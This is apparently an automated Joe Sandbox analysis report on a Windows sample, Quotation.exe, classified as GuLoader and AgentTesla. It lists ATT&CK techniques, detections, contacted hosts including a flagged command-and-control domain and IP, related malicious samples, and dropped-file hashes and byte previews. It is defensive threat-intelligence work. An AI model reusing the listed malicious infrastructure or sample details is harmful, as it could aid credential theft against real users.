Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	141 Virtualization/Sandbox Evasion	LSA Secrets	141 Virtualization/Sandbox Evasion	SSH	1 Clipboard Data	23 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Access Token Manipulation	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Process Injection	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Quotation.exe	45%	ReversingLabs	Win32.Trojan.Guloader

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nsc3F6A.tmp\System.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://api.ipify.org/	0%	URL Reputation	safe
http://x1.c.lencr.org/0	0%	URL Reputation	safe
http://x1.i.lencr.org/0	0%	URL Reputation	safe
https://apis.google.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
drive.google.com	172.217.18.14	true	false	unknown
drive.usercontent.google.com	142.250.185.129	true	false	unknown
api.ipify.org	104.26.13.205	true	false	unknown
showpiece.trillennium.biz	67.23.226.139	true	true	unknown
mail.showpiece.trillennium.biz	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.ipify.org/	false	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://showpiece.trillennium.biz	Quotation.exe, 00000004.00000002.2951221358.000000003818C000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.google.com	Quotation.exe, 00000004.00000003.2390412411.000000000796D000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000004.00000003.2390564510.000000000796D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://drive.usercontent.google.com/M	Quotation.exe, 00000004.00000002.2930496341.0000000007967000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://r11.o.lencr.org0#	Quotation.exe, 00000004.00000002.2930496341.0000000007967000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000004.00000002.2952001929.000000003A86A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://mail.showpiece.trillennium.biz	Quotation.exe, 00000004.00000002.2951221358.000000003818C000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://drive.google.com/	Quotation.exe, 00000004.00000002.2930496341.00000000078F8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://x1.c.lencr.org/0	Quotation.exe, 00000004.00000002.2930496341.0000000007967000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000004.00000002.2952001929.000000003A86A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://x1.i.lencr.org/0	Quotation.exe, 00000004.00000002.2930496341.0000000007967000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000004.00000002.2952001929.000000003A86A000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://drive.google.com/U	Quotation.exe, 00000004.00000002.2930496341.00000000078F8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://drive.usercontent.google.com/	Quotation.exe, 00000004.00000002.2930496341.0000000007967000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://apis.google.com	Quotation.exe, 00000004.00000003.2390412411.000000000796D000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000004.00000003.2390564510.000000000796D000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://nsis.sf.net/NSIS_Error...	Quotation.exe, 00000000.00000002.2182367467.0000000000408000.00000002.00000001.01000000.00000003.sdmp, Quotation.exe, 00000000.00000000.1671553900.0000000000408000.00000002.00000001.01000000.00000003.sdmp, Quotation.exe, 00000004.00000000.2174095294.0000000000408000.00000002.00000001.01000000.00000003.sdmp	false		unknown
http://r11.i.lencr.org/0	Quotation.exe, 00000004.00000002.2930496341.0000000007967000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 00000004.00000002.2952001929.000000003A86A000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
67.23.226.139	showpiece.trillennium.biz	United States	33182	DIMENOCUS	true
142.250.185.129	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
172.217.18.14	drive.google.com	United States	15169	GOOGLEUS	false
104.26.13.205	api.ipify.org	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1547059
Start date and time:	2024-11-01 20:27:51 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 18s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Quotation.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/12@4/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 86% Number of executed functions: 141 Number of non-executed functions: 23
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Quotation.exe

Simulations

Behavior and APIs

Time	Type	Description
15:30:01	API Interceptor	436x Sleep call for process: Quotation.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
67.23.226.139	Quotation.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	Revised PI 28 08 2024.exe	Get hash	malicious	AgentTesla	Browse
	PI 22_8_2024.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	COTIZACION 19 08 24.exe	Get hash	malicious	AgentTesla	Browse
	pago.exe	Get hash	malicious	AgentTesla	Browse
	invoice.exe	Get hash	malicious	AgentTesla	Browse
	SijLVTsunN.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	DHL BILL OF LANDING SHIPPING INVOICE DOCUMENTS.exe	Get hash	malicious	AgentTesla	Browse
	PO#86637 copy.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse
	hI1ho6jgmf.exe	Get hash	malicious	AgentTesla	Browse
104.26.13.205	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	RDPWrap Tool	Browse	api.ipify.org/
	Prismifyr-Install.exe	Get hash	malicious	Node Stealer	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, PrivateLoader, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	Unknown	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar	Browse	api.ipify.org/
	file.exe	Get hash	malicious	LummaC, RDPWrap Tool, LummaC Stealer, Vidar	Browse	api.ipify.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.ipify.org	w9ap9yNeCb.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	Payslip_October_2024.pdf.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	ae713827-e32c-f66b-fbdb-5405db450711.eml	Get hash	malicious	Unknown	Browse	104.26.13.205
	kill.exe	Get hash	malicious	Unknown	Browse	104.26.13.205
	rMT103_126021720924.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	u9aPQQIwhj.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.74.152
	Shipping documents 000293994900.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	172.67.74.152
	file.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.13.205
	Proforma Invoice.scr.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	file.exe	Get hash	malicious	CredGrabber, Meduza Stealer	Browse	104.26.12.205

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	172.64.41.3
	Ziraat Bankasi Swift Mesaji.pdf.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	Payment Slip_SJJ023639#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	https://secure.2checkout.com/affiliate.php?ACCOUNT=LANTECHS&AFFILIATE=120043&PATH=https%3A%2F%2FV0F5F.apexstructural.co	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	188.114.96.3
	o3QbCA4xLs.exe	Get hash	malicious	Stealc, Vidar	Browse	172.67.179.207
	https://hubs.ly/Q02WCPYS0	Get hash	malicious	Unknown	Browse	104.18.41.137
	https://acrobat.adobe.com/id/urn:aaid:sc:VA6C2:595729f4-6ee1-464c-a534-c9dd79612c8d	Get hash	malicious	HTMLPhisher	Browse	104.21.70.55
	SWIFT COPY 2.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
DIMENOCUS	Quotation.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	67.23.226.139
	https://lumen.backerkit.com/invites/mAqpu6B5ZtIAsrg4a5WdGA/confirm?redirect_path=//rahul-garg-lcatterton-com.athuselevadores.com.br	Get hash	malicious	HTMLPhisher	Browse	107.161.183.172
	http://prabal-gupta-lcatterton-com.athuselevadores.com.br/	Get hash	malicious	HTMLPhisher	Browse	107.161.183.172
	nklarm7.elf	Get hash	malicious	Unknown	Browse	109.73.163.173
	rtransferencia-.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	138.128.178.242
	bin.i586.elf	Get hash	malicious	Gafgyt, Mirai	Browse	98.142.105.97
	https://docsend.com/view/63jvhxyyj7pwxerg	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	64.37.50.172
	RemotePCViewer.exe	Get hash	malicious	Unknown	Browse	199.168.186.114
	http://usaf.gov.ss	Get hash	malicious	Unknown	Browse	198.136.48.242
	https://svsjie.us9.list-manage.com/track/click?u=65baddd8dc4a29452f1a28eb2&id=dde4f4d149&e=6d04ecfe32	Get hash	malicious	Unknown	Browse	184.171.250.122

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Order 1108739138.vbs	Get hash	malicious	Unknown	Browse	104.26.13.205
	swift-copy31072024PDF.vbs	Get hash	malicious	Unknown	Browse	104.26.13.205
	Payment slip.vbs	Get hash	malicious	Unknown	Browse	104.26.13.205
	file.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.26.13.205
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	104.26.13.205
	Payment Slip_SJJ023639#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.26.13.205
	https://hubs.ly/Q02WCPYS0	Get hash	malicious	Unknown	Browse	104.26.13.205
	rQUOTATION_NOVQTRA071244__PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	104.26.13.205
	Pt7TlAjQtn.exe	Get hash	malicious	AveMaria, WhiteSnake Stealer	Browse	104.26.13.205
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	104.26.13.205
37f463bf4616ecd445d4a1937da06e19	o3QbCA4xLs.exe	Get hash	malicious	Stealc, Vidar	Browse	142.250.185.129 172.217.18.14
	s0zj3gVOXC.exe	Get hash	malicious	Zhark RAT	Browse	142.250.185.129 172.217.18.14
	AVCAOCT4jW.exe	Get hash	malicious	Zhark RAT	Browse	142.250.185.129 172.217.18.14
	s0zj3gVOXC.exe	Get hash	malicious	Zhark RAT	Browse	142.250.185.129 172.217.18.14
	AVCAOCT4jW.exe	Get hash	malicious	Zhark RAT	Browse	142.250.185.129 172.217.18.14
	N#U0435wIns.exe	Get hash	malicious	Vidar	Browse	142.250.185.129 172.217.18.14
	#U2749processo#U2749_#U2464#U2461#U2467#U2465#U2462#U2463#U2467#U2461.hta	Get hash	malicious	Unknown	Browse	142.250.185.129 172.217.18.14
	achoo.exe	Get hash	malicious	GuLoader	Browse	142.250.185.129 172.217.18.14
	achoo.exe	Get hash	malicious	FormBook, GuLoader	Browse	142.250.185.129 172.217.18.14
	PRICE ENQUIRY - RFQ 6000073650.exe	Get hash	malicious	Azorult, GuLoader	Browse	142.250.185.129 172.217.18.14

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsc3F6A.tmp\System.dll	Quote_220072.exe	Get hash	malicious	AgentTesla	Browse
	Quotation.exe	Get hash	malicious	FormBook, GuLoader	Browse
	Quotation.exe	Get hash	malicious	FormBook, GuLoader	Browse
	PO-000172483.exe	Get hash	malicious	FormBook, GuLoader	Browse
	PO-000172483.exe	Get hash	malicious	FormBook, GuLoader	Browse
	PO-000172483 (2).exe	Get hash	malicious	FormBook, GuLoader	Browse
	Quotation.exe	Get hash	malicious	FormBook, GuLoader	Browse
	Quotation.exe	Get hash	malicious	AgentTesla, GuLoader	Browse
	rPO-000172483.exe	Get hash	malicious	FormBook, GuLoader	Browse
	rPO-000172483.exe	Get hash	malicious	FormBook, GuLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nsc3F6A.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\Quotation.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	5.97694153396788
Encrypted:	false
SSDEEP:	192:acA1YOTDExj7EFrYCT4E8y3hoSdtTgwF43E7QbGPXI9uIc6w79Mw:RR7SrtTv53tdtTgwF4SQbGPX36wJMw
MD5:	D6F54D2CEFDF58836805796F55BFC846
SHA1:	B980ADDC1A755B968DD5799179D3B4F1C2DE9D2D
SHA-256:	F917AEF484D1FBB4D723B2E2D3045CB6F5F664E61FBB3D5C577BD1C215DE55D9
SHA-512:	CE67DA936A93D46EF7E81ABC8276787C82FD844C03630BA18AFC3528C7E420C3228BFE82AEDA083BB719F2D1314AFAE913362ABD1E220CB364606519690D45DB
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Quote_220072.exe, Detection: malicious, Browse Filename: Quotation.exe, Detection: malicious, Browse Filename: Quotation.exe, Detection: malicious, Browse Filename: PO-000172483.exe, Detection: malicious, Browse Filename: PO-000172483.exe, Detection: malicious, Browse Filename: PO-000172483 (2).exe, Detection: malicious, Browse Filename: Quotation.exe, Detection: malicious, Browse Filename: Quotation.exe, Detection: malicious, Browse Filename: rPO-000172483.exe, Detection: malicious, Browse Filename: rPO-000172483.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@t.]!..]!..]!...T..Z!...Y..Z!..]!..I!...T..Y!...T..\!...T..\!...T..\!..Rich]!..................PE..L.....*c.........."!.....$..........J........@...............................p............@..........................@.......A..P............................`.......................................................@..X............................text...{".......$.................. ..`.rdata.......@.......(..............@..@.data...D....P.......,..............@....reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Music\antithetic.ini

Download File

Process:	C:\Users\user\Desktop\Quotation.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	35
Entropy (8bit):	4.264578373902383
Encrypted:	false
SSDEEP:	3:apWPWPjNLCNHiy:UPRCNHiy
MD5:	58AC0B5E1D49D0EE1AED2FE13FAE6C7A
SHA1:	02C8384573D47CA39F2E2ACA32B275861EC59A93
SHA-256:	624F49944CB84ED51FECABCD549AE3B47152F9A20C4A95E93C8B007AEFE9FEAB
SHA-512:	8F5F062D6EBB8312DA4AD4F5AF077B1EAA2E14244823F15E6A87A9E48C7172CC1EA5AB691D3B4F9D8F8E0605F9CB3AA06590B4389820DA531633D9915B988FFC
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	[broadspread]..slyngvrk=houghband..

C:\Users\user\overlays\besvangredes\Emmens.udk

Download File

Process:	C:\Users\user\Desktop\Quotation.exe
File Type:	data
Category:	dropped
Size (bytes):	482519
Entropy (8bit):	1.2446382063037653
Encrypted:	false
SSDEEP:	1536:+yiLw81PnsncGiIsTVODPOqNbsVEVWZkZA4:G/Pne9iIyVODPsVpZkZA4
MD5:	1D099F6122F4B7C8A78925726B59E5C3
SHA1:	EEA154E31FF04CD1A2CED0193F7633ED219CFA47
SHA-256:	1B6DC1EAD079DB05B998725B154E803E6E1504E7E5B49C5611D55E018CD45E6D
SHA-512:	F31F0A285C5A6EB2236CCD49A8BF939E46624F270E0270FC4C5640B37684BC1C7780C5350F778DA8E9D0B8CD25320C1909A9CD937F15BB3A7CDDBCEEE94C47FB
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.....................................FP.l...........-...............#............W.............a...............3..........1..i.k.............;......H.............................2..............X..H.....}..................................................M.........M........................................................8......_............8....................................................................?...................................................................................J..............................................T.....................................................B..........................7.....................4........o..P................!........................................................................q..........................................................................l............................;...................................q...............................g.......mm......................................n.......................P.........

C:\Users\user\overlays\besvangredes\Flirtish.Dai

Download File

Process:	C:\Users\user\Desktop\Quotation.exe
File Type:	data
Category:	dropped
Size (bytes):	141327
Entropy (8bit):	4.608940051109185
Encrypted:	false
SSDEEP:	3072:VN1e86WYE6C9jyymU9LA5K3Et3RWYM5gg:VekfF94K3EtBWYkD
MD5:	5E0FBB8824A8BFEC31C19926B691EF86
SHA1:	0B77905858FF54631C6DB2C417E5583236BAB98C
SHA-256:	D6B517F8A8C4B93F8BD0A3D9BF513459936EA8FD5521D83920C329D894EB14B4
SHA-512:	395AFB4D33BC9CE20C062A271C3A4DBB0C44F3621BBCDF5CAADF58EDBD0D63A08925601804D14BA39B340771D5B558AE7D20EC9A4773CCD50EE7B043275531DD
Malicious:	false
Reputation:	low
Preview:	..........H....//.....b................B..................]]]]./...........T...................z..k.........E.........s....##............yyyy........d.....:..........................c.........EE........................ooo.......iiii..................\|......K.....PPPP.......................vvv.......y......vvvvvv..............m............66.bbb.....a.........................XXXXXXXXXX................ttttttt.......*........ ..............h.....>>>>.........................................hhh...........h..........999..XX........5...C.....]]]...........l....]..........,,,.4.qqq.)..................ff...^^^............z...........9.rr....OO.............}.....^^^^.)...,..........@@......$.==..!.5...........v..................T.z......\|\|\|.......3..................K.....ii.....BB......................a.......11.VV....M................555....RRR..[[[[[._...........................p............JJJ............w............O.............PPP.....................y....HH........g.G...................

C:\Users\user\overlays\besvangredes\Otomaco.Eta

Download File

Process:	C:\Users\user\Desktop\Quotation.exe
File Type:	data
Category:	dropped
Size (bytes):	353542
Entropy (8bit):	7.681232808052351
Encrypted:	false
SSDEEP:	6144:GO1jOE2gJQAtsNGKmFCR0l3h0Y+Qm/XVKf/17R7C:L5Jb+F+13h05Qm/XqW
MD5:	0B8469A4A00396D93894F3CA7C8254E3
SHA1:	209FB7B86C9911ACE50DD144876354148F5915FB
SHA-256:	C3B5CFE284B81B2E6C1028B3DAA96C9171B060614FFBD5CCEDF2C24E108DE2DF
SHA-512:	BE3E87F72255F0EA7BC46B9235B78DD8CE75CFF68E7F270FF320F53826D8E99DBD7CE6034D42F8085431ABAFAC0A027E085F1D91DBD42925E7832B41F93C0836
Malicious:	false
Reputation:	low
Preview:	.............................z.................................aa.z....AA.%%...Z..........OO..X.@@@@@........................................F....................7...........==..........GGGG...LL.....dd.NN.............G.......bbb.O......!!!.ee.................-..&...GYg>...8C.5L..l..p..b.].,.-dF.N.m..........f.d..#....R8..s....ilc\|2Tw.MI.ftK.U..P....f....a..2Y..{y:;..)...%}.~qS.......7......E.$..Bj6....a......M..f.k..6V.....=.....!..H.<z.e.v......`.DaN...JQ...'u.4.wC...f.b....B......k......h..@..X..?r...........Z...OA...n[..1.^...x."...0\_f..M.f.......)o..&...GYg>...8C.5L..l..p..b.].,.-dF.N....9.......-....9....R8..s....ilc\|2Tw.MI.ftK.U..P..Y..{.f.q..../:;..)...%}.~qS.......7......E.$..Bj6....a...V....n....8....=.....!..H.<z.e.v......`.DaN...JQ...'u.4.wC........\;......k......h..@..X..?r........f...u.......Z...OA...n[..1.^...x."...f...f.r....40\_Vo..&...GYg>...8C.5L..*l..p..b.].,.-dF.N.m....9.....j.....e..8..R8..s....ilc\|2Tw.MI.ftK.U..P..Y..{y:;..)...%

C:\Users\user\overlays\besvangredes\Proprietrer.bet

Download File

Process:	C:\Users\user\Desktop\Quotation.exe
File Type:	data
Category:	dropped
Size (bytes):	288955
Entropy (8bit):	1.2577770955280814
Encrypted:	false
SSDEEP:	768:l1SkOmjqFRV/HZzy6+19kZBH4YVHCdJS7G5iOUEEaXXLlgHHl7MRY9hN+418WPK5:KOqvBJzC5vBhp8KT9AGCbQTZkkR
MD5:	0B62328C4966F6B879B3C13B7FBD9C0D
SHA1:	6DD81F12E739E81E06778067513ED1178A06AFC9
SHA-256:	645C325F62AF720972466322B09A7E396E46D8E640B138D582374B68D763A3A7
SHA-512:	2F738A2950352F124F7B969D38B52BD2E4453FF42BC8DEB7566620E6CDEA30368A6DC16230BA49050F8C0327175CAB71DC4A1709541F08A3FFDCF55FAF5B75B8
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.........................................s.............i.......................................A.........................4.......;........i................................................_........................-.&..............................+..........................................................8.............................................?....U........................................................~........g... .....?...............................................................f............................S..................................!...........................j.............m....g....................................(............................z....d..........z..........^...............s...........................H............................t..........A.....................\|............................................................[.................................................\.......................v...........o...................................m...........

C:\Users\user\overlays\besvangredes\Trikstanks.pra

Download File

Process:	C:\Users\user\Desktop\Quotation.exe
File Type:	data
Category:	dropped
Size (bytes):	340974
Entropy (8bit):	1.254605943274635
Encrypted:	false
SSDEEP:	768:AgVdAd1etxyZmQhZgJwrQTTwKuiTGrJqCoIEsPkZnFFSKsOI4v/3n35lB3LiADa4:5TxLsV5IjQ3xx12
MD5:	49BE0E06F2E4F0CCFFB46426EE262642
SHA1:	FF9C56C31A824E4CA087705C23D01D288FE34239
SHA-256:	A55DAC07FB586D4B64F0DDF812087A2EEEC6F5286D9BC73AD648ED3220ABDD3A
SHA-512:	27E9D035708943DD257186457C15488C9405747FC77F7C76760C96EE011C239F9FA53B5DA17958038FB2BA1C4E27E643E7924A37E6164E250B9F45A109D92E53
Malicious:	false
Preview:	.....................................n.........A...5............K.................C.........a............>....................................................................................p...................................................................................................................W.......................................m.........................................M..........................'......i.............................................................................................4....................................}....................................................................................................................................................x...........S..................'..y............................................../..........................................M..................Z.................................V.......................................=.....N...............................n..................................\|. .....

C:\Users\user\overlays\besvangredes\boyaus.rom

Download File

Process:	C:\Users\user\Desktop\Quotation.exe
File Type:	data
Category:	dropped
Size (bytes):	392462
Entropy (8bit):	1.241128723454179
Encrypted:	false
SSDEEP:	768:jby0EUrStmwpKcx/orVcYZ+M3ok1I7vZFCDrlv2UV5t3votN6cGia46OGj3OkYSk:FaZaukRTadSdbrJ5N275Ea3nRYS3r
MD5:	F130EC3095DBECEDC791D8C58A59040C
SHA1:	DAD2300B487F31F199520E1B41AB02B7D677B352
SHA-256:	A56351ED69A301F5D9D89B6530280B7A85F998A806E1648911C37B6983BA9426
SHA-512:	8599200F472F2D59390E8F2C497331640B12AB9FAF71817160C6D450EDF8A99F78CEF28CC3B57581D6AECFC1EC90A49947A6685C606321B6EE300D483C838360
Malicious:	false
Preview:	..................J......-..............K....e..........1......................D....................................?............K.V..............................................\....3.......................................L.................................A.........i........,...........................P.{............................................................r................................................V........................................e............&.................................................7...................k.........<...s................).................................................x...............................j................................`.................b.................G.......w..........................................{.........................................G..............................:.................#..............................................<..O......^..........O..............................7..\................................

C:\Users\user\overlays\besvangredes\gear.dra

Download File

Process:	C:\Users\user\Desktop\Quotation.exe
File Type:	data
Category:	dropped
Size (bytes):	433786
Entropy (8bit):	1.255949132332751
Encrypted:	false
SSDEEP:	768:NFXORpsqJLOaVDzzoIgUPRGRoYNxHVxyczaUz4pP9Nom56I4tY6UBh1Yc88LaAQo:TUAoYxPzqoIzdwWR1+/24cwZXeCPiIBo
MD5:	53FF1A157920AE92C9BF891D453D6B65
SHA1:	B7BF3B7B16048F38132D8ACCA841130D73DB44C3
SHA-256:	FAD1B5E641DC44B5A51048470D4E0FB47664CF2B994CEA24304495D99323B9DE
SHA-512:	E739381C24627F89255DB55B2DA39A09F055A322C577C3604BA048FB2C817AE7F63B12131F8461491F6140953FB33DD94EB66D8CB3B13B36717143342CE270AF
Malicious:	false
Preview:	......................................j......................................."t......... .............Z..........................................+...o..G.......d......................................................................................X................5....................................F.........'.....................................................U...............................\............Y............)..............................d..D....................................................%.................................................Y..#.......................................................................................................................^.........................................j...........w...............................................n.....................................V..........i.............................................6...7..........*.........................................................................H.............................

C:\Users\user\overlays\besvangredes\jagtfalk.ill

Download File

Process:	C:\Users\user\Desktop\Quotation.exe
File Type:	data
Category:	dropped
Size (bytes):	374902
Entropy (8bit):	1.250991222921627
Encrypted:	false
SSDEEP:	1536:XkYzjcLYszRzU5n1C900tMkYQx+gnpovYHO:XkYz4DzQB5sYYH
MD5:	169115C751DDA5E021E8C86E8454B26D
SHA1:	5A8254634C0C726BB18E42E626EAEB581D532DCD
SHA-256:	ACCD4911D88E808AED4A2AA27394628C62574810B0B47977B7103A246FDF2A10
SHA-512:	2B643014E8623CADBA7CE78B91D3C751D60FCBF3FA69FA26F29A14E55679FC6A5C2074834B2496773A1756E3172EC7C898E2DF29CB4A0513DBF8BC0DCDDA7E04
Malicious:	false
Preview:	.......].....................................................S....................................^.4....................=.b.........................................................................o....O..................O........................t..............................I.................................................................;......................................m...................A.....................................i.........................................=...............................................................................................u..&...............................v............=................v...............p...............O.......'.............................K........................;............m......P................x.f....................K[.(..A..........#........................J..L........................i........................X................................................................................N..............f.........

C:\Users\user\overlays\besvangredes\regill.ful

Download File

Process:	C:\Users\user\Desktop\Quotation.exe
File Type:	data
Category:	dropped
Size (bytes):	489048
Entropy (8bit):	1.245615736901525
Encrypted:	false
SSDEEP:	1536:HMtjgMjMD1whyMu1IXCVAcFNpruXO+nBJH:stjgmYi03XDL+nBJ
MD5:	B4FB425BAF217F31E91AAB39ABF66DCD
SHA1:	03DE3BD0F923AB14213B6C4461C5CA73A0A6371C
SHA-256:	4BC57A47B82B63EC20B393F65F3585EB81FE3F7748229CD19DEC8FE8A41D67C3
SHA-512:	E72395FD6098130EFD543C5941781A1AA80FCE17C7701CB40FA8874271E0D43E0F7F082EBF5D458181287DE41CF4B34F88DCAABE84D8AD51003EF5DA1495D871
Malicious:	false
Preview:	.............9.....................A..............Z...........=.........................................................h...'.........................................................L..............................................p..C...........................,...................................p..........S............................................................................{............................................(.........C...^.......................................U.........~................................................z.....................................A................................................]..........i.............,....................................g..............................3......K.....................u..............................................................H.t....................................................................................................................`.............................)1.............q..............4....

C:\Users\user\overlays\besvangredes\sortlistningens.txt

Download File

Process:	C:\Users\user\Desktop\Quotation.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	371
Entropy (8bit):	4.247837387326688
Encrypted:	false
SSDEEP:	6:r8pLNAsEyv1WABlvMW9uu+IXvVJyQXPhXOQemtNxgFUvNwmA6AQOp2jMPA9cnb:ruJAOgABlQuTXbyKhXOLmtLgHmFOYjMV
MD5:	46003C65AA12A0EBE55662F0141186DC
SHA1:	739652C3375018DAFFB986302A7D3E8D32770B41
SHA-256:	2EA079DEDE1B356842C5F5E0751B5E2B6565FDED65DAFB59A73D170C002ABB27
SHA-512:	59D394789F9EECE97873D56AEA64F353D3E13E007E4ACBD396AC76CB68E91494EB65888049EF05CBE9B20597ADADCC960D067F90AAD3EA5AA46AC3A82F5B82FD
Malicious:	false
